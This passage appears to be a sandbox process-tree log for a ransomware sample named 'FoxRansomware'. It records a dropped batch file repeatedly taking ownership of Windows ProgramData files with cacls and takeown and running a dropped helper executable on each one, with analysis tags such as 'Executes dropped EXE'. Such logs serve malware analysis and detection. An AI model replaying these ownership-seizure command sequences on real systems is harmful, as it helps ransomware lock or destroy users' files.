C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:2452
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:4044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵PID:5868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:2288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:3708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:1768
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:4284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:5716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "background.png" -nobanner3⤵PID:5256
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "background.png" -nobanner4⤵
- Executes dropped EXE
PID:920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:5780
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:5332
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:5156
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:4884
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:6056
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:5912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:5496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:5392
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:2568
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:280
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:304
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:5616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:5236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "superbar.png" -nobanner3⤵PID:2936
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "superbar.png" -nobanner4⤵
- Executes dropped EXE
PID:5644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:5664
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:3916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Modifies file permissions
PID:5988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:5776
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml""2⤵PID:5360
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml" /E /G Admin:F /C3⤵PID:4400
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml"3⤵PID:5668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:3572
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:4924
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:3272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵PID:5508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "watermark.png" -nobanner3⤵PID:2844
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "watermark.png" -nobanner4⤵
- Executes dropped EXE
PID:5908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:1000
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:4040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- Modifies file permissions
PID:5812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:5292
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:5228
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:5528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:5732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:5196
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵PID:3488
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:3544
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:5168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵PID:5504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:4448
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵PID:2452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:5692
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:5472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:3244
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵PID:4508
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""2⤵PID:5452
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C3⤵PID:5156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"3⤵PID:5408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftNotepad.xml" -nobanner3⤵PID:2608
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftNotepad.xml" -nobanner4⤵PID:6104
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""2⤵PID:5496
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C3⤵PID:288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"3⤵PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner3⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner4⤵PID:5464
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""2⤵PID:5236
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C3⤵PID:5832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"3⤵PID:5500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "NetworkPrinters.xml" -nobanner3⤵PID:2372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "NetworkPrinters.xml" -nobanner4⤵PID:5660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""2⤵PID:5400
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C3⤵PID:5664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"3⤵PID:5864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner3⤵PID:5152
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner4⤵PID:4468
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""2⤵PID:5824
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C3⤵PID:2812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"3⤵PID:4032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner3⤵PID:4360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner4⤵PID:4372
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2744
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""2⤵PID:5268
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C3⤵PID:1752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"3⤵
- Modifies file permissions
PID:5596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner3⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner4⤵PID:5148
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:4212
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:4376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵PID:4488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:6112
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""2⤵PID:4720
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C3⤵PID:4424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"3⤵
- Modifies file permissions
PID:6140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner3⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner4⤵PID:2588
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""2⤵PID:5128
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C3⤵PID:1816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"3⤵PID:5972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner3⤵PID:2672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner4⤵PID:5216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""2⤵PID:5084
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C3⤵PID:1924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"3⤵PID:2528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftWordpad.xml" -nobanner3⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftWordpad.xml" -nobanner4⤵PID:5332
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""2⤵PID:5156
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C3⤵PID:3940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"3⤵
- Modifies file permissions
PID:4776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "DesktopSettings2013.xml" -nobanner3⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "DesktopSettings2013.xml" -nobanner4⤵PID:4884
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""2⤵PID:292
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C3⤵PID:6120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"3⤵PID:5232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner3⤵PID:5880
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner4⤵PID:5392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""2⤵PID:4008
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C3⤵PID:5416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"3⤵PID:4500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner3⤵PID:2840
-
